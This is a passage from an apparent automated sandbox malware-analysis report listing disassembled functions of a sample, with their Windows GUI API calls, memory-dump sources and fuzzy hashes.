                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72144a2b06bfe87e45b4171367c299c04ea981dd7501082e02e1637e3e8cc1a9
                                                              • Instruction ID: 0ffd8f97a1c40a76cd39a7fc8f7dec1f3c305efea8465df58af50d719a0b208b
                                                              • Opcode Fuzzy Hash: 72144a2b06bfe87e45b4171367c299c04ea981dd7501082e02e1637e3e8cc1a9
                                                              • Instruction Fuzzy Hash: 0C01A2B22092157EF62136786CC9F2BA74DDF523BCB350326F631911D1DB708D41A768
                                                              Function 00CB22B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00CB22D7
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB22E9
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB22FF
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB231A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 2403c2ecd236f574aeab44ccc790fbf9795dc2666c1894552755f09701f2f382
                                                              • Instruction ID: 7a79e405a4a8ed9aec6f3d8ce2e6f19625e7446b869b170a5f7d5bbe72500d8c
                                                              • Opcode Fuzzy Hash: 2403c2ecd236f574aeab44ccc790fbf9795dc2666c1894552755f09701f2f382
                                                              • Instruction Fuzzy Hash: 0911093A900218FFEB119BA5CD85FDDFBB8EB08750F200091EA11B7290D671AE10DB94
                                                              Function 00CEA852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C52441: GetWindowLongW.USER32(00000000,000000EB), ref: 00C52452
                                                              • GetClientRect.USER32(?,?), ref: 00CEA890
                                                              • GetCursorPos.USER32(?), ref: 00CEA89A
                                                              • ScreenToClient.USER32(?,?), ref: 00CEA8A5
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 00CEA8D9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: 2ac14dec0a6d790454ae9e677235aa33f855c51e893c75657ef3bac74408185d
                                                              • Instruction ID: da5b0306bf44db57768296a03a66f94c79f307aa74fd46e783d918388ebf5b22
                                                              • Opcode Fuzzy Hash: 2ac14dec0a6d790454ae9e677235aa33f855c51e893c75657ef3bac74408185d
                                                              • Instruction Fuzzy Hash: F3113671900199FFDF24DF99D885AEE77B8FB05300F000456F912E6190D730BA82DBA2
                                                              Function 00CBEA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00CBEA29
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00CBEA5C
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CBEA72
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CBEA79
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 2fd4960345213f3a3c6bfd1d918028e1b5b34bd0c5830164aae9b7dc61f3d3a1
                                                              • Instruction ID: 7ebd71e87af98fe8f44fa7cc11908b2909506a006e3e01e23dd4ad7b1ac6167d
                                                              • Opcode Fuzzy Hash: 2fd4960345213f3a3c6bfd1d918028e1b5b34bd0c5830164aae9b7dc61f3d3a1
                                                              • Instruction Fuzzy Hash: 5E110476904298BFC711EFA89C45BEF7FADAB45320F00421AF825E7390D2748E0497B1
                                                              Function 00CE8773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00CE8792
                                                              • ScreenToClient.USER32(?,?), ref: 00CE87AA
                                                              • ScreenToClient.USER32(?,?), ref: 00CE87CE
                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CE87E9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                              • String ID:
                                                              • API String ID: 357397906-0
                                                              • Opcode ID: 70ce92bab74562a3ec528fafa3af737f423e925392be2510d744f00466a259c9
                                                              • Instruction ID: e66d4148383ed6548ada3a658f87d80eccf41f36dcc315b48fa32a1eda930fb7
                                                              • Opcode Fuzzy Hash: 70ce92bab74562a3ec528fafa3af737f423e925392be2510d744f00466a259c9
                                                              • Instruction Fuzzy Hash: 831142B9D00249EFDB41CFA9C884AEEBBF9FB08310F108166E925E7210D735AA54CF50
                                                              Function 00C52150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00C5216C
                                                              • SetTextColor.GDI32(?,?), ref: 00C52176
                                                              • SetBkMode.GDI32(?,00000001), ref: 00C52189
                                                              • GetStockObject.GDI32(00000005), ref: 00C52191
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Color$ModeObjectStockText
                                                              • String ID:
                                                              • API String ID: 4037423528-0
                                                              • Opcode ID: c9bd655694521619b06a53c9ddcd66861f751b45720fbfa0a7ce92c629b4891b
                                                              • Instruction ID: ce87400293bc231d6e71796ccb929e5c05251e615d030ef9143dbd967b891904
                                                              • Opcode Fuzzy Hash: c9bd655694521619b06a53c9ddcd66861f751b45720fbfa0a7ce92c629b4891b
                                                              • Instruction Fuzzy Hash: B9E06D322406C0AEDB215B74AC49BED7B61AB12336F048219F6BB4C0E0C37287409B20
                                                              Function 00CAEBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00CAEBD6
                                                              • GetDC.USER32(00000000), ref: 00CAEBE0
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAEC00
                                                              • ReleaseDC.USER32(?), ref: 00CAEC21
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: f20b5ae8c0bf5523e84a91490e0ef81fb512b1f7f4fe87db9611fbe781d71b0e
                                                              • Instruction ID: a4bdb75d95efcb246823e11978f952369b71157a94237b6beaa445a3dfe1b619
                                                              • Opcode Fuzzy Hash: f20b5ae8c0bf5523e84a91490e0ef81fb512b1f7f4fe87db9611fbe781d71b0e
                                                              • Instruction Fuzzy Hash: 86E01AB4800245DFCF50AFA19888B6DBBB5FB48311F14884AF90BAB210CB398941EF14
                                                              Function 00CAEBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00CAEBEA
                                                              • GetDC.USER32(00000000), ref: 00CAEBF4
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAEC00
                                                              • ReleaseDC.USER32(?), ref: 00CAEC21
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 05783e6be87e367c942b1d2b6060770dd83579abeb4f0c2b8bf8700bc946c639
                                                              • Instruction ID: ed256c7e9d61d8fd49730245fbd768c8ff79ff23ce2a1c20b8b7cfe915379c6e
                                                              • Opcode Fuzzy Hash: 05783e6be87e367c942b1d2b6060770dd83579abeb4f0c2b8bf8700bc946c639
                                                              • Instruction Fuzzy Hash: 95E01AB4800244DFCF509FB0888876DBBB5BB48311F14884AF90AAB210CB395901DF00
                                                              Function 00C7E60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00C7E69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 8df711b1e36c606a7c8c7e614006153e29d7fd6f7cbadd5700a7ad97b5e3fd78
                                                              • Instruction ID: 3b408528b01d7674102fa7d73ae22208a86ce9a32625f0b7d91b6157e8ce14f3
                                                              • Opcode Fuzzy Hash: 8df711b1e36c606a7c8c7e614006153e29d7fd6f7cbadd5700a7ad97b5e3fd78
                                                              • Instruction Fuzzy Hash: 10518E6290810596CB15B714DD0537E2BA4AB54704FB0C9D8F0B9866F8EF348E9ADB4E
                                                              Function 00C6A86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: e6c0d6717d93c01d37cdd8946756a964bd984a1837b77b51a08a6f58be183b1f
                                                              • Instruction ID: c5c67acc246e5ef307ebeb7e4536ba8c828d849aa1150b9fbc70f78dc7b0c476
                                                              • Opcode Fuzzy Hash: e6c0d6717d93c01d37cdd8946756a964bd984a1837b77b51a08a6f58be183b1f
                                                              • Instruction Fuzzy Hash: 18514535504247DFDF25DF28D4A06FABBA4EF1A314F244055ECA1AB2D0DB349E4ACB61
                                                              Function 00CD60A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper_wcslen
                                                              • String ID: CALLARGARRAY
                                                              • API String ID: 157775604-1150593374
                                                              • Opcode ID: 3db4fedeb09d08510bc5f272414e406b1bb8fa48399622dbc17ac900f52ce886
                                                              • Instruction ID: 7eecdae9bc59bef168ea8c340d1541a1cb88e566f3fbf96f007c190213d2f92e
                                                              • Opcode Fuzzy Hash: 3db4fedeb09d08510bc5f272414e406b1bb8fa48399622dbc17ac900f52ce886
                                                              • Instruction Fuzzy Hash: F6419071A002199FCF04EFA9C8819EEBBB5FF58324F14402AE916A7352DB709D81DF90
                                                              Function 00CE4E96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00CE4F7E
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CE4F93
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: ee2d32905dc17e22bd27f4e4073120d2c3a61ff00c4130000afa7dc0b20c9846
                                                              • Instruction ID: 34618c4d4c8aa6b1b712691e747f5f4579ce3ec04465bd74083d717c3665e949
                                                              • Opcode Fuzzy Hash: ee2d32905dc17e22bd27f4e4073120d2c3a61ff00c4130000afa7dc0b20c9846
                                                              • Instruction Fuzzy Hash: F5312C74A013499FDB18CFAAC881BDABBB5FF49704F10416AE915AB391D770A941CF90
                                                              Function 00CE406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C57759
                                                                • Part of subcall function 00C5771B: GetStockObject.GDI32(00000011), ref: 00C5776D
                                                                • Part of subcall function 00C5771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C57777
                                                              • GetWindowRect.USER32(00000000,?), ref: 00CE40D9
                                                              • GetSysColor.USER32(00000012), ref: 00CE40F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: 138dfa589f83e0d08282a40003c330262af4b6acb2decaa39fa7e64379eedb3d
                                                              • Instruction ID: e58c1586fba2f8e62e18c51fad0ccfc1ace63532a594e00bda759ee79b40d8a6
                                                              • Opcode Fuzzy Hash: 138dfa589f83e0d08282a40003c330262af4b6acb2decaa39fa7e64379eedb3d
                                                              • Instruction Fuzzy Hash: D1112672610249AFDF01DFA9CC46AFE7BB8FB08314F004924F956E7250E675E891EB60
                                                              Function 00CB256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CB25DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: 5355843bcc86b75863517a9eaa331029f91541998dc4189979c5d602f5eea546
                                                              • Instruction ID: 8f943a58b6542791412a079d76216d174d493ec597169b18811262d9148668fa
                                                              • Opcode Fuzzy Hash: 5355843bcc86b75863517a9eaa331029f91541998dc4189979c5d602f5eea546
                                                              • Instruction Fuzzy Hash: D9012875604119ABCF24EBA4CC51DFE7775AF56310F040609B873972D7EE309D4CA660
                                                              Function 00CB2468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00CB24D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: 97463f134fdad43f5c49ab0ec3d785f3d1b19dceb29f31f762db207e8d09f7d2
                                                              • Instruction ID: c78850c6ffed5e486e17dc7557e66f31e3b2a39e1e8b34d78228e84fa773a482
                                                              • Opcode Fuzzy Hash: 97463f134fdad43f5c49ab0ec3d785f3d1b19dceb29f31f762db207e8d09f7d2
                                                              • Instruction Fuzzy Hash: B201F275A04109ABCB28FBA0CD52EFF7BB89F15300F140019A802672C7DA209E0CEA71
                                                              Function 00CB24EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00CB2558
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_wcslen
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 624084870-1403004172
                                                              • Opcode ID: f97c31b2c5dc8dff1f2ba63336dd164a7ed53ded3106d93d31a4a1e469d4b115
                                                              • Instruction ID: 5e6ca85cbfacf23c181826950d2c1d3965b713b916112b09c92d2a92efba8a1a
                                                              • Opcode Fuzzy Hash: f97c31b2c5dc8dff1f2ba63336dd164a7ed53ded3106d93d31a4a1e469d4b115
                                                              • Instruction Fuzzy Hash: C101FD75A00109ABCB25EBA4CA12EFFBBA89B15700F140015B802A7286EA20DF0CA671
                                                              Function 00CB25F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00CB2663
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
